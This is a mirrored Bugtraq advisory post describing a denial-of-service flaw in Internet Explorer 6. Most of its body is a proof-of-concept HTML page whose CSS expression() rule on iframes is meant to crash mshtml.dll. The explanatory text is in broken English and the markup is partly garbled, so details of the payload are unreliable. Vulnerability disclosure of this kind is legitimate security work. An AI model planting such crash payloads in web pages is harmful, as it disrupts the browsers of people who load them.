| New User, Welcome! Login |
IE6 css set Denial of Service Vulnerability
| From: |
info securitylab ir |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
IE6 css set Denial of Service Vulnerability |
| Date: |
Mon - Jul 12, 2010 06:44 AM |
Published by Securitylab.ir
Founder: unknown
<style type="text/css">
<! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll ->
/*<![ CDATA [*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
# F126 (v: expression ()! Important)
/*]]>*/
</ Style>
<iframe id=f126 src=test>
Original Advisory:
http://securitylab.ir/other/IE-1.txt
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
